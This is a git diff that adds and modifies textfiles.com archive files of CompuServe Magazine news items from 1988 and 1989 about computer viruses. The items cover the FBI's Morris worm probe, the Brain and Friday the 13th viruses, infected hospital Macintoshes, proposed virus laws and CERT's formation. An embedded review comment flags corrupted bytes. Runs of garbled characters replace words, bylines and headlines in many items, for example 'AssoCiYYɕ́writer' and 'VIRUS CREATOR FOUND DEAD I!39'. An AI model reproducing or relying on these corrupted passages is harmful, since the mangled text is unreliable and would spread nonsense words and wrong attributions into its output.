+ Curiously, in light of Krafft's statements, Lynn is quoted as saying, "It's +quite conceivable we may not be able to say with any certainty" if the virus was +created in Cornell's computer system. + Lynn also said the university had been contacted by the FBI, but there was no +indication any criminal charges would be filed. Officials said the school could +discipline Morris if he was involved. + By the way, one Cornell official, who spoke on condition of anonymity, told AP +that it appeared there was an earlier version of the virus in Morris' computer +files. + Regarding possible penalties, United Press International this morning quoted +an FBI spokesman as saying that the person responsible for the virus could face +up to 20 years in prison and $250,000 in fines for the federal offense of +unauthorized access to government computers. + Finally, Harvard graduate student Paul Graham, a friend of Morris, told the +Times he thought Morris' exploit was similar to that of Mathias Rust, the young +West German who flew a light plane through Soviet air defenses in May 1987 and +landed in Moscow. + "It's as if Mathias Rust had not just flown into Red Square, but built himself +a stealth bomber by hand and then flown into Red Square." + --Charles Bowen + + + +NEW LAN LABORATORY GROUP OFFERS SUGGESTIONS FOR VIRUS PREVENTION + + (Nov. 7) + Just a week or so before thousands of networked computers across the country +were struck by a rapid virus, some 60 computer companies endorsed a set of +virus-prevention guidelines drafted by the National LAN Laboratory. + The Reston, Va., group, devoted to local area networks, hopes its tips can +prevent and control future viruses and worm program intrusions. + Speaking with business writer Peter Coy of The Associated Press, LAN Lab +spokesman Delbert Jones said, "The key issue is that with proper precautions, +one can continue to live a normal existence. ... "It's very much like the AIDS +virus: The best solution is precaution." 
+ Here, according to AP, are the suggestions by the LAN Lab group: + 1. All software should be purchased from known, reputable sources. + 2. Purchased software should be in its original shrink wrap or sealed disk +containers when received. + 3. Back-up copies should be made as soon as the software package is opened. +Back-ups should be stored off-site. + 4. All software should be reviewed carefully by a system manager before it is +installed on a network. + 6. New software should be quarantined on an isolated computer. This testing +will greatly reduce the risk of system virus contamination. + 7. A back-up of all system software and data should be made at least once a +month, with the back-up copy stored for at least one year before re-use. This +will allow restoration of a system that has been contaminated by a +"time-released" virus. A plan that includes "grandfathered" rotation of back-up +copies will reduce risk even further. + 8. System administrators should restrict access to system programs and data on +"needmSkͥ͹a isolte!pKͱ protects critZX +ѥͱ +and aids problem diagnosis. + 9. All programs on a system should be checked regularly for program length +changes. Any program-length deviations could be evidence of tampering, or virus +infiltration. + 10. Many shared or free programs are invaluable. However, these are the prime +entry point for viruses. Skeptical review of such programs is prudent. Also, +extended quarantine is essential before these programs are introduced to a +computer system. + 11. Any software that exhibits symptoms of possible virus contamination should +be removed immediately. System managers should develop plans for quick removal +of all copies of a suspect program, and immediate backup of all related data. +These plans should be made known to all users, and tested and reviewed +periodicalQ#jjŹBowen + + +FBI UPGRADES VIRUS PROBE TO A "FULL CRIMINAL INVESTIGATION" + + (Nov. 
8) + The young man alleged to have written the virus that stymied some 6,000 +networked computers last week has hired a Washington, D.C., attorney. His +selection apparently comes just in time, because the FBI reportedly is upgrading +its probe of the matter to a full criminal investigation. + Robert T. Morris Jr., 23-year- old Cornell University graduate student, has +not been formally charged, but nonetheless is widely alleged to have created the +virus that played havoc for 36 hours last week with Unix- based computers on the +Pentagon-backed ARPANET network and other systems. + Associated Press writer Anne Buckley this morning reported that lawyer Thomas +Guidoboni of the Washington firm of Bonner & O'Connell has been retained to +represent Morris. Guidoboni told Buckley, "We have notified the federal +authorities of our representation and (Morris') whereabouts. We are in the +process of investigating the facts and circumstances which have been reported by +the press in order to determine our course of action." + Meanwhile, The Washington Post this morning quoted law enforcement sources as +confirming their inquiry has been expanded to a full field investigation by the +FBI's Washington field office. That means the FBI has consulted with federal +prosecutors, agreed that the bureau has jurisdiction and that there is reason to +believe there may have been a violationot federal criminal law. + "In a full-scale investigation," Buckley said, "the government has the power +to subpoena records and documents and compel testimony through the authorization +of immunity, two techniques which are not permitted through preliminary +inquiries. The move indicate(s) the FBI (is) moving very quickly in the case +because in many instances, preliminary inquiries take a month or more." 
+ AP also quoted a government source who spoke on condition of anonymity as +saying investigators aren't sure whether any criminal activity actually +occurred, as defined by a statute passed in 1984. + Says Buckley, "A section of that law says it is unlawful to enter a government +computer with the intent to disrupt its functions. The crime is punishable by up +to 10 years in prison. The source said that in this case, there's no evidence +that anything was taken from the computers, but rather that it was a question of +disrupting computer systems. One section of law addresses sabotage, but the +source said it (is) unclear whether the virus case would involve an intent to +disrupt the computer." + AP says its source believes the bureau is investigating the matter in view of +the fact that there were breaches of security, and that the Justice Department +will have to determine whether the matter involved criminal conduct. + --Charles Bowen + + + +GOVERNMENT MAY SUBPOENA CORNELL + + (Nov. 9) + Sources close to the investigation of last week's massive virus attack say the +government may seek search warrants or subpoenas to get documents from Cornell +University before trying to interview the virus's alleged author. + AssoCiYYɕ́writer Pete Yost quotes Washington, D.C., lawyer Thomas +Guidoboni as saying he hasn't been contacted by the FBI since informing the +bureau that he was chosen on Monday to represent the suspect, 23-year-old Robert +T. Morris Jr., a Cornell graduate student. + Says Guidoboni, "The ball's in their court. We're waiting to hear from them." + Yost notes that earlier the FBI had sought to question Morris, but that was +before Guidoboni was retained. The lawyer told AP he didn't think "we'll have +enough information by the end of this week" to determine whether to talk to the +FBI. He says he wants to talk more with his client before deciding what course +to take. 
+ Says the wire service, "The possibility of seeking grand jury subpoenas or a +search warrant for data at Cornell that could shed light on the computer virus +incident was considered (yesterday) within the FBI. It was discarded as being +unnecessary and then revived in discussions with Justice Department lawyers, +said the sources, speaking on condition of anonymity." + Meanwhile, Cornell Vice President M. Stuart Lynn reiterated that the +university will cooperate fully with the investigation. + Morris, son of acclaimed computer security expert Robert Morris Sr. of Arnold, +Va., has not been formally charged. Still, he is widely alleged to be the person +who created the virus that paralyzed some 6,000 networked Unix-based computers +on the Pentagon-backed ARPANET network and other systems for about 36 hours last +week. + --Charles Bowen + + + +"BRAIN VIRUS" APPEARS IN HOUSTON + + (Nov. 9) + A version of the so-called "Brain virus," a rogue program believed to have +originated in Pakistan, now has cropped up in computers used by University of +Houston business students. Texas officials say that the virus, while a nuisance, +has posed no real problem. + University research director Michael Walters told The Associated Press, "It +probably hasn't cost us much, except a few days of people-time to clean up these +disks, but it probably cost the students a good bit of frustration." + Some students report they have lost data, but Walters told the wire service he +knows of no one who has lost an entire term paper or other large quantity of +work. Nonetheless, reports still were coming in from students late yesterday. + This version of the Brain virus, which last spring was traced to a computer +store in Lahore, Pakistan, announced itself at the university early last week on +the screen of one of the 150 PCs the business department has for students and +faculty. Walters said the virus hasn't spread to the school's larger computers. 
+ AP quotes Walters as saying the virus flashed this message (with these +misspellings) to students who tried to use infected programs: + "Welcome to the dungeon. Copyright 1968 Brain & Amjads, PVT, LTD. Virus shoe +record V9.0. Dedicated to the dynamic memory of millions of virus who are no +longer with us today -- Thank Goodness. BEWARE OF THE VIRUS. This program is +catching. Program follows after these messeges." + The original "Brain" virus -- which appeared in May at colleges and businesses +along the East Coast and in the computers of The Providence, R.I., +Journal-Bulletin newspaper -- flashed the "Welcome to the Dungeon" message, but +added "Contact us for vaccination." It also gave names, an address and a phone +number of two brothers who run a Lahore, Pakistan, computer store. + Walters said the Houston version of the virus says nothing about any vaccine, +and the "V9.0" in its message suggests it may be a modified version. + Before this, the most recent sighting of the "Brain" virus was at Business +International, a Hong Kong financial operation. It was thought to be the first +reported digital infection of a commercial business in the East. The firm is +believed not to have suffered any major damage. + --Charles Bowen + + + +UNIX EXPERT SAYS VIRUS "PANIC" UNNECESSARY, BLAMES BAD PLANNING + + (Nov. 10) + An expert on the Unix operating system says that much of last week's "panic" +over the virus that brought down some 6,000 networked computers was caused by +poor management technique. + In a statement from his Rescue, Calif., offices, newsletter editor Bruce +Hunter said, "Most of the damage was done by the organizations themselves, not +the virus." + Hunter, who edits Root, a bimonthly Unix administration and management journal +published by InfoPro Systems, observed that more than 50,000 users were +reportedly cut off at a single site due to last week's virus, and that more than +a million people are believed to have been directly affected. 
+ However, Hunter said, "By dropping network connections, administrators were +ensuring that the virus was winning. Good communications and information sharing +between administrators is what helped people on the network find and implement a +solution to the virus quickly." + Hunter, who also is an author and mainframe Unix system manager, said that one +job of an administrator is to keep all system resources available to users, and +another is to "go around searching for possible trouble." + He said the most important lesson learned from last week's virus was that a +definite plan is imperative to avoid inappropriate reactions. + Hunter made these suggestions to managers: + -:- Develop a set of scenarios and responses for future virus attacks as well +as physical disasters. + -:- Keep a printed list of system administrators at all company sites. + -:- Establish a central point of information. + -:- Coordinate an emergency response task force of key personnel. + -:- Keep current off-site backups of all data. + -:- Perform regular security audits. + --Charles Bowen + + + +FBI LOOKING AT WIDE RANGE OF POSSIBLE VIOLATIONS IN VIRUS CASE + + (Nov. 10) + The FBI now is looking at a wide range of possible federal violations in +connection with last week's massive computer virus incident, ranging beyond the +bureau's original focus on the provisions of the Computer Fraud and Abuse Act of +1986. + That was the word today from FBI Director William Sessions, who told a news +conference in Washington that the FBI is trying to determine whether statutes +concerning wire fraud, malicious mischief or unlawful access to stored +communications may have been broken. + The Associated Press notes that earlier the FBI had said it was concentrating +on the 1986 Computer Fraud and Abuse Act, which prohibits fraud or related +activity in connection with computers. 
+ The FBI chief said, "We often look at intent as being knowing and intentional +doing of an act which the law forbids and knowing that the law forbids it to be +done. But we also have other statutes which deal simply with knowingly doing +something." + The wire service observed the following about two statutes to which Sessions +referred: + -:- The malicious mischief statute provides a maximum 10-year prison term for +anyone who wilfully interferes with the use of any communications line +controlled by the US government. + -:- The unlawful access law makes it a crime to prevent authorized access to +electronic communications while they are in electronic storage and carries a +maximum six-month jail term absent malicious destruction or damage. + Sessions also told reporters the preliminary phase of the bureau's criminal +investigation probably will be completed in the next two weeks. + As reported here earlier, authorities think 23-year-old Cornell University +student Robert T. Morris created the virus that disrupted thousands of networked +computers last week. However, Morris has not yet been charged with any crime. + --Charles Bowen + + + +MICHIGAN WEIGHS ANTI-VIRUS LAW + + (Nov. 15) + Michigan lawmakers soon will consider a proposed state law that would impose +felony penalties against anyone convicted of creating or spreading computer +"viruses." + Sponsoring the bill, Republican Sen. Vern Ehlers told United Press +International, "Because this is a new type of crime, it is essential we address +it directly with a law that deals with the unique nature of computers." + Citing this month's virus attack on military and research computers linked by +ARPANET and other networks, Ehlers added, "The country recently saw how quickly +a virus can spread through network users. The Defense Department and its +contractors were extremely fortunate that the virus was relatively harmless." 
+ The senator said his bill, still being drafted, is expected to include +provisions making it a felony for anyone to deliberately introduce a virus into +a computer system. + UPI notes Ehlers is a physicist with a Ph.D who has 30 years' experience with +computers. + --Charles Bowen + + + +VIRUS STRIKES CALIF. MACINTOSHES + + (Nov. 15) + Students at Southern California universities were being warned today of a +rapidly spreading West German virus that reportedly is disrupting functions of +Apple Macintosh computers. + "In general, this thing is spreading like mad," Chris Sales, computer center +consultant at California State University at Northridge, told The Associated +Press. "It originated in West Germany, found its way to UCLA and in a short time +infected us here." + AP quotes school officials as saying that at least a dozen Macs at the +suburban San Fernando Valley campus have been infected since the virus first +cropped up last week. Cal State says the virus apparently does not erase data, +but that it does stall the computers and removal requires hours of +reprogramming. + The wire service said students' disks are "being tested for the virus" before +they can rent a Mac0a the`+˕ͥ偽ѽɕj +@"--CarlY.ݕ5 + + + +COMPUTER SECURITY EXPERT OFFERS TIPS + + (Nov. 15) + The need to protect against computer viruses has heralded the end of the +user-friendly computer era, says one security expert. + According to Government Computer News, Sanford Sherizen, president of Data +Security Systems Inc. of Natick, Mass. said the objective now is to make +software bullet-proof, not accessible. + He said that since the advent of computers in offices, managers have been +faced with the conflicting needs of protecting the data versus producing it. +Data must be accessible to those who need it and yet at the same time secure +from those who can alter, delete, destroy, disclose or steal it or steal +computm!hardware. + Sherizen told GCN reporter Richard A. 
Danca that non- technical managers can +contribute to computer security as advocates and facilitators. Users must learn +that security is a part of their jobs. + He predicted that security managers will soon use biometric security measures +such as comparing retinal blood vessels or fingerprints. Needless to say, such +techniques raise complicated issues of civil liberties and privacy. + Sherizen said that all information deserves protection. + --Cathryn Conroy + + + +VIRUS THREAT SAID EXAGGERATED + + (Nov. 16) + Because of the latest reports of attacks by computer "viruses," some in the +industry are ready to blame such rogue programs for anything that goes wrong. + However, expert Charles Wood told a 15th annual computer security conference +in Miami Beach, Fla., this week, "Out of over 1,400 complaints to the Software +Service Bureau this year, in only 2 percent of the cases was an electronic virus +the cause of the problem. People are jumping to the conclusion that whenever a +system slows down, it's a virus that's responsible." + The Associated Press reports that Wood and other panelists cautioned that +computer-dependent companies should focus more on the day-to-day breakdowns +caused by human error than on viruses. + President Steve Irwin of LeeMah Datacom Security Corp. told the conference +that this month's virus assault on networked computers on the ARPANET system +"could be a cheap lesson." + Said Irwin, "We were lucky because it was not a real malicious attempt ... If +(the virus' author) had ordered the programs to be erased, the loss could have +gone into billions, lots of zeroes." + AP quoted Wood as adding, "The virus is the hot topic right now, but actually +the real important subject is disaster recovery planning. But that's not as +glamorous as the viruses." + --Charles Bowen + + +FBI SEIZES MORRIS RECORDS IN PROBE OF NATIONAL VIRUS CASE + + (Nov. 17) + While young Robert T. Morris Jr. 
still has not been charged with anything in +connection with the nation's largest computer virus case, the FBI now reveals +that items it has seized so far in its probe include magnetic tapes from Morris' +computer account at Cornell University. + The Associated Press reports that documents released by the FBI late yesterday +say investigators seized "two magnetic tapes labeled `files from Morris account +including backups' and hard copy related thereto" from Dean Krafft, a research +associate in computer science at Cornell, where the 23- year-old Morris is a +graduate student. + AP says the agents also obtained "two yellow legal pads with calculus and +assorted notes." Associate university counsel Thomas Santoro had taken the legal +pads from an office in Upson Hall, a campus building that contains computer +science classrooms and offices, AP says. + Even though Morris hasn't been charged, it has been widely reported that the +young man told friends he created the virus tHa stymied an estimated 6,200 +Unix- based computers on ARPANET and other networks for some 36 hours earlier +this month. + As reported, the FBI is conducting a criminal investigation to determine +whether statutes concerning wire fraud, malicious mischief or unlawful access to +stored communications may have been violated. + AP quotes these latest FBI documents as saying that US District Judge Gustave +J. DiBianco in the northern district of New York in Syracuse issued two warrants +on Nov. 10 for the Cornell searches. The FBI searches were conducted that same +afternoon. + "The government had said earlier that it might try to obtain documents from +the university before interviewing Morris," AP observes, "and Cornell's vice +president for information technologies, M. Stuart Lynn, had said the university +would cooperate fully with the investigation." + --Charles Bowen + + +SPA FORMS GROUP TO KNOCK DOWN RUMORS ABOUT COMPUTER VIRUSES + + (Nov. 
17) + Upset over wild rumors about the destructiveness of computer viruses, the +Software Publisher Association has formed a special interest group to address +computer security. + In a statement released today at the Comdex trade show in Las Vegas, SPA says +its new Software Security SIG will help distribute information and serve as +liaison for software publishers, industry analysts and consultants. + McGraw-Hill News quotes SPA member Ross Greenberg, president of Software +Concepts Design, as saying, "Recent unsubstantiated statements regarding the +actual damage caused by viruses...has caused more of XՉfervor than served +as a public service." + At the SIG's organizational meeting, several companies discussed setting +standards on how to educate the public regarding viruses and various anti-viral +products now being advertised. + --Charles Bowen + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir89.vir b/textfiles.com/virus/csvir89.vir new file mode 100644 index 00000000..8af421d5 --- /dev/null +++ b/textfiles.com/virus/csvir89.vir 
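Review bot: this hunk adds the file with several stretches of corrupted bytes where readable text should be, so the copy as committed will index garbage; the damaged spots are the byline of the Nov. 9 "GOVERNMENT MAY SUBPOENA CORNELL" item (`AssoCiYYɕ́writer Pete Yost`, evidently "Associated Press writer"), the closing sentence and signature of the Nov. 15 "VIRUS STRIKES CALIF. MACINTOSHES" item (`--CarlY.ݕ5`, where every other item in the file is signed `--Charles Bowen`), the word "hardware" at the end of the Nov. 15 Sherizen item, "that" in the Nov. 17 FBI seizure item and `XՉfervor` in the Ross Greenberg quote of the SPA item. The pattern (a run of high bytes replacing a few ASCII characters) looks like a transcoding artefact introduced when the file was fetched, not damage present in the original article text, so the fix is to re-fetch the file from textfiles.com as raw bytes and commit that, or at minimum record the known-corrupt spots in the commit message rather than adding the mangled copy silently. The missing trailing newline (`\ No newline at end of file`) is minor and can be fixed in the same pass.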
@@ -0,0 +1,1235 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + + +- 1989 - + + +VIRUS STRIKES UNIVERSITY OF OKLA. + + (Jan. 11) + Officials at the University of Oklahoma in Norman, Okla., blame a computer +virus for ruining several students' papers and shutting down terminals and +printers in a student lab at the university library. + Manager Donald Hudson of Bizzell Memorial Library told The Associated Press +that officials have purged the library computers of the virus. He said the +library also has set up extra computers at its lab entrance to inspect students' +programs for viruses before they are used on other computers. + The wire service said the library's virus probably got into a computer through +a student's disk, but the student may not have known the virus was there. Hudson +said the library's computers are not linked to any off-campus systems. However, +the computers are connected through printers, which he said allowed the virus to +spread. + --Charles Bowen + + +"FRIDAY THE 13TH" VIRUS STRIKES + + (Jan. 13) + Data files and programs on personal computers throughout Britain apparently +were destroyed today by what was termed a "Friday the 13th" computer virus. + Alan Solomon, managing director of S and S Enterprises, a British data +recovery center, told The Associated Press that hundreds of users of IBM and +compatible PCs reported the virus, which he said might be a new species. 
+ Solomon, who also is chairman of an IBM users group, told the wire service +that phone lines to the center were busy with calls for help from businesses and +individuals whose computers were struck by the virus. + "It has been frisky," he said, "and hundreds of people, including a large firm +with over 400 computers, have telephoned with their problems." + S and S hopes to figure out how the virus operates and then attempt to disable +it. "The important thing is not to panic and start trying to delete everything +in a bid to remove the virus," Solomon said. "It is just a pesky nuisance and is +causing a lot of problems today." + --Charles Bowen + + +"FRIDAY THE 13TH" VIRUS MAY BE NEW VERSION OF ONE FROM ISRAEL + + (Jan. 14) + Investigators think the "Friday the 13th" virus that struck Britain yesterday +might be a new version of the one that stymied computers at the Hebrew +University in Jerusalem on another Friday the 13th last May. + As reported here yesterday (GO OLT-308), hundreds of British IBM PCs and +compatibles were struck by the virus, which garbled data and deleted files. + Jonathan Randal of The Washington Post Foreign Service reports the program is +being called the "1,813" variety, because of the number of unwanted bytes it +adds to infected software. + He says the specialists are convinced the program "is the brainchild of a +mischievous -- and undetected -- computer hacker at Hebrew University." + Alan Solomon, who runs the IBM Personal Computer User Group near London, told +the Post wire service that 1,813 was relatively benign, "very minor, just a +nuisance or a practical joke." + Solomon said he and other specialists first noted the virus in Britain several +months ago when it began infecting computers. Solomon's group wrote security +software with it distributed free, so, he said, the virus basically struck only +the unlucky users who didn't take precautions. + --Charles Bowen + + + +LIBRARY OF CONGRESS VIRUS VICTIM + + (Jan. 
27) + An official with the US Library of Congress acknowledges that the institution +was struck by a computer virus last fall. + Speaking to a delegation of Japanese computer specialists touring Washington, +D.C., yesterday, Glenn McLoughlin of the library's Congressional Research +Service disclosed that a virus was spotted and killed out of the main catalog +computer system before it could inflict any damage to data files. + Associated Press writer Barton Reppert quoted McLoughlin as saying, "It was +identified before it could spread or permanently erase any data." + McLoughlin added the virus was found after personnel logged onto computers at +the library and noticed they had substantially less memory space to work with +than they had expected. + He said the virus apparently entered the system through software obtained from +the University of Maryland. "We don't know," he said, "whether it was a student +at Maryland, or whether Maryland had gotten it from somebody else. That was +simply the latest point of departure for the software." + Meanwhile, Reppert also quoted computer security specialist Lance J. Hoffman +of George Washington University as saying the world may be heading toward a +catastrophic computer failure unless more effective measures are taken to combat +viruses. + Comparing last November's virus assault on the Pentagon's ARPANET network to a +nuclear accident that "could have had very disastrous consequences for our +society," Hoffman told the visitors, "It wasn't Chernobyl yet, it was the Three +Mile Island -- it woke a lot of people up." + Online Today has been following reports of viruses for more than a year now. +For background files, type GO OLT-2039 at any prompt. And for other stories from +The Associated Press, type GO APO. + --Charles Bowen + + + +CHRISTMAS VIRUS FROM FRANCE? + + (Jan 30) + A little noticed software worm, the so-called Christmas Decnet virus, may +have originated from Germany or France. 
Apparently released at the end of +December, the worm replicated itself only onto Digital Equipment Corp. computers +that were connected to Decnet, a national communications network often accessed +by DEC users. + At least one system administrator has noticed that the worm collected +identifying information from the invaded terminals and electronically mailed +that information to a nedwrk`J2ancen Te assmptZJ́that the French +node collected the information and, subsequently, used it to propagate the worm +throughout the network. + The so-called German connection came about because of the way the worm +presents text information on invaded terminals. Though written in English, the +worm message is said to contain strong indications of Germanic language syntax. +Predictably, a German "connection" has led to speculation that Germany's Chaos +Computer Club may have had a role in worm's creation. + --James Moran + + + +SPLIT SEEN ON HOW TO PROSECUTE MAN ACCUSED OF ARPANET VIRUS + + (Feb. 2) + Authorities apparently are divided over how to prosecute Robert T. Morris Jr., +the 23- year-old Cornell University graduate student suspected of creating the +virus that stymied the national Arpanet computer network last year. + The New York Times reports today these two positions at issue: + -:- US Attorney Frederick J. Scullin in Syracuse, N.Y., wants to offer Morris +a plea bargain to a misdemeanor charge in exchange for information he could +provide. Scullin reportedly already has granted Morris limited immunity in the +case. + -:- Some in the US Justice Department want Morris charged with a felony in +hopes of deterring similar computer attacks by others. They are angry over +Morris's receiving limited immunity. + Confirming a report in The Times, a source who spoke on condition of anonymity +told Associated Press writer Carolyn Skorneck the idea of granting Morris +limited immunity has "caused a lot of consternation down here." 
+ Skorneck notes the 1986 Computer Fraud and Abuse Act makes unlawful access to +a government computer punishable by up to a year in jail and a $250,000 fine. If +fraud is proved, the term can reach 20 years in prison. + The source told AP, "As far as we're concerned, the legal problem was still +(Morris's) intent." In other words, officials apparently are uncertain whether +Morris had planned to create and spread the virus that infected some 6,000 +government computers on the network last Nov. 2. + As reported earlier, Morris allegedly told friends he created the virus but +that he didn't intend for it to invade the Unix- based computers linked to +Arpanet. + Skorneck says Mark M. Richard, the Justice Department official who is +considering what charges should be brought in the case, referred questions to +the FBI, which, in turn, declined to discuss the case because it is an ongoing +investigation. + 0Hweverl S۷]֭ -said he understood the FBI was extremely upset over +the limited immunity granted to Morris. + Meanwhile, Morris's attorney, Thomas Guidoboni of Washington, D.C., said no +plea bargain had been worked out, "They have not told me," he said, "what +they've recommended, and I've not offered on behalf of my client to plead guilty +to anything. I have told p(Y[Wt plead guilty to a felony. I'm very +emphatic about that." + --Charles Bowen + + + +FEDERAL GROUP FIGHTS VIRUSES + + (Feb. 3) + The Computer Emergency Response Team (CERT) has been formed by the Department +of Defense and hopes to find volunteer computer experts who will help federal +agencies fight computer viruses. CERT's group of UNIX experts are expected to +help users when they encounter network problems brought on by worms or viruses. + A temporary group that was formed last year after Robert T. Morris Jr. +apparently let loose a bug that infected the Department of Defense's Advanced +Project Agency network (ARPANET), will be disbanded. 
+ The Morris case has some confusing aspects in that some computer groups have +accused federal prosecutors with reacting hysterically to the ARPANET infection. +It has been pointed out that the so-called Morris infection was not a virus, and +that evidence indicates it was released onto the federal network accidentally. + CERT is looking toward ARPANET members to supply its volunteers. Among those +users are federal agencies, the Software Engineering Institute and a number of +federally-funded learning institutions. Additional information is available from +CERT at 412/268- 7090. + --James Moran + + + +COMPUTER VIRUSES HOT ISSUE IN CONGRESS + + (Feb. 3) + One of the hottest high-tech issues on Capitol Hill is stemming the plague of +computer viruses. + According to Government Computer News, Rep. Wally Herger (R-Calif.) has +pledged to reintroduce a computer virus bill that failed to pass before the +100th Congress adjourned this past fall. The measure will create penalties for +people who inject viruses into computer systems. + "Unfortunately, federal penalties for those who plant these deadly programs do +not currently exist," said Herger. "As a result, experts agree that there is +little reason for a hacker to even think twice about planting a virus." (Herger +then later corrected himself saying those who plant viruses are not hackers but +rather criminals.) + GCN notes that the bill calls for prison sentences of up to 10 years and +extensive fines for anyone convicted of spreading a computer virus. It would +also allow for civil suits so people and businesses could seek reimbursement for +system damage caused by a virus attack. + If the bill is referred to the Judiciary Committee, as is likely, it stands a +reasonable chance of passage. Rep. Jack Brooks, a longtime technology +supporter, is the new head of that committee and he has already stated that the +new position will not dampen his high-tech interests. 
+ -- Cathryn Conroy CONGRESS LOOKS AT ANOTHER COMPUTER PROTECTION BILL + + (Feb. 27) + The Computer Protection Act (HR 287) is the latest attempt by Congress to +battle computer viruses and other forms of sabotage on the high-tech machines. + Introduced by Rep. Tom McMillan (D-Md.), the bill calls for a maximum of 15 +years in prison with fines of $100,000 to $250,000 for those convicted of +tampering with a computer, be it hardware or software. + "With the proliferation of various techniques to tamper with computers, we +need to fill the void in federal law to deal with these criminals," said +McMillan. "This legislation will send the clear signal that infiltrating +computers is not just a cute trick; it's against the law." + The bill, which has been referred to the Judiciary Committee, is written quite +broadly and is open to interpretation. + -- Cathryn Conroy + + + +VIRUS CREATOR FOUND DEAD I!39 + + (March 17) + A Californian who said he and one of his students created the first computer +virus seven years ago as an experiment has been found dead at 39 following an +apparent aneurysm of the brain. + Jim Hauser of San Luis Obispo died Sunday night or Monday morning, the local +Deputy Coroner, Ray Connelly, told The Associated Press. + Hauser once said he and a student developed the first virus in 1982, designing +it to give users a "guided tour" of an Apple II. He said that, while his own +program was harmless, he saw the potentially destructive capability of what he +termed an "electronic hitchhiker" that could attach itself to programs without +being detected and sneak into private systems. + --Charles Bowen + + + +HOSPITAL STRUCK BY COMPUTER VIRUS + + (March 22) + Data on two Apple Macintoshes used by a Michigan hospital was altered recently +by one or more computer viruses, at least one of which apparently traveled into +the system on a new hard disk that the institution bought. 
+ In its latest edition, the prestigious New England Journal of Medicine quotes +a letter from a radiologist at William Beaumont Hospitals in Royal Oak, Mich., +that describes what happened when two viruses infected computers used to store +and re!d)nuclear scans that are taken to diagnose patients' diseases. + The radiologist, Dr. Jack E. Juni, said one of the viruses was relatively +benign, making copies of itself while leaving other data alone. However, the +second virus inserted itself into programs and directories of patient +information and made the machines malfunction. + "No lasting harm was done by this," Juni wrote, because the hospital had +backups, "but there certainly was the potential." + Science writer Daniel Q. Haney of The Associated Press quoted Juni's letter as +saying about three-quarters of the programs stored in0te`jII@PCs were +infected. + Haney said Juni did not know the origin of the less harmful virus, "but the +more venal of the two apparently was on the hard disk of one of the computers +when the hospital bought it new. ... The virus spread from one computer to +another when a doctor used a word processing program on both machines while +writing a medical paper." + Juni said the hard disk in question was manufactured by CMS Enhancements of +Tustin, Calif. + CMS spokesman Ted James confirmed for AP that a virus was inadvertently put on +600 hard disks last October. + Says Haney, "The virus had contaminated a program used to format the hard +disks. ... It apparently got into the company's plant on a hard disk that had +been returned for servicing. James said that of the 600 virus-tainted disks, 200 +were shipped to dealers, and four were sold to customers." + James also said the virus was "as harmless as it's possible to be," that it +merely inserted a small piece of extra computer code on hard disks but did not +reproduce or tamper with other material on the disk. 
James told AP he did not +think the Michigan hospital's problems actually were caused by that virus. + --Charles Bowen + + + + +MORE HOSPITALS STRUCK BY VIRUS + + (March 23) + The latest computer virus attack, this one on hospital systems, apparently was +more far- reaching than originally thought. + As reported here, a radiologist wrote a letter to the New England Journal of +Medicine detailing how data on two Apple Macintoshes used by the William +Beaumont Hospital in Royal Oak, Mich., was altered by one or more computer +viruses. At least one of the viruses, he said, apparently traveled into the +system on a new hard disk the institution bought. + Now Science writer Rob Stein of United Press International says the virus -- +possibly another incarnation of the so-called "nVIR" virus -- infected computers +at three Michigan hospitals last fall. Besides the Royal Oak facility, computers +at another William Beaumont Hospital in Troy, Mich., were infected as were some +desktop units at the University of Michigan Medical Center in Ann Arbor. + Stein also quoted Paul Pomes, a virus expert at the Univershy of Illinois in +Champaign, as saying this was the first case he h@`YX.zJ +5Rh$Vkɭѕa computer used for patient care or diagnosis in a hospital. +However, he added such disruptions could become more common as personal +computers are used more widely in hospitals. + The virus did not harm any patients but reportedly did delay diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems. + Dr. Jack Juni, the radiology who reported the problem in the medical journal, +said the virus "definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely." He added that if +patient information had been lost, the virus could have forced doctors to repeat +tests that involve exposing patients to radiation. 
Phony and garbled files could +have caused a mix-up in patient diagnosis. "This was information we were using +to base diagnoses on," he said. "We were lucky and caught it in time." + Juni said the virus surfaced when a computer used to display images used to +diagnose cancer and other diseases began to malfunction at the 250-bed Troy +hospital last August. In October, Juni discovered a virus in the computer in the +Troy hospital. The next day, he found the same virs2in a similar computer in +the 1,200-bed Royal Oak facility. + As noted, the virus seems to have gotten into the systems through a new hard +disk the hospitals bought, then spread via floppy disks. + The provider of the disk, CMS Enhancements Inc. of Tustin, Calif., said it +found a virus in a number of disks, removed the virus from the disks that had +not been sent to customers and sent replacement programs to distributors that +had received some 200 similar disks that already had been shipped. + However, CMS spokesman Ted James described the virus his company found as +harmless, adding he doubted it could have caused the problems Juni described. +"It was a simple non-harmful virus," James told UPI, "that had been created by a +software programmer as a demonstration of how viruses can infect a computer." + Juni, however, maintains the version of the virus he discovered was a mutant, +damaging version of what originally had been written as a harmless virus known +as "nVIR." He added he also found a second virus that apparently was harmless. +He did not know where the second virus originated. + --Charles Bowen + + +GOVERNMENT PLANS FOR ANTI-VIRUS CENTERS + + (March 24) + Federal anti-virus response centers that will provide authentic solutions to +virus attacks as they occur will be developed by the National Institute of +Standards and Technology, reports Government Computer News. 
+ The centers will rely on unclassified material throughout the federal +government and provide common services and communication among other response +centers. + NIST will urge agencies to establish a network of centers, each of which will +service a different use or technological constituency. They will offer +emergency response support to users, including problem-solving and +identification of resources. GCN notes they will also aid in routine information +sharing and help identify problems not considered immediately dangerous, but +which can make users or a system vulnerable to sabotage. + A prototype center called the Computer Emergency Response Team is already +operational at the Defense Advanced Research Projects Agency and will serve as a +model for the others. + Although NIST and the Department of Energy will provide start-up funds, each +agency will have to financially support its response center. + --Cathryn Conroy + + + +MORRIS "WORM" WAS NEITHER GENIUS NOR CRIMINAL, COMMISSION SAYS + + (April 2) + A Cornell University investigating commission says 23- year-old graduate +student Robert Morris acted alone in creating the rogue program that infected up +to 6,000 networked military computers last Nov. 2 and 3. + In addition, the panel's 45- page report, obtained yesterday by The Associated +Press, further concludes that while the programming by the Arnold, Md., student +was not the work of a genius, it also was not the act of a criminal. + 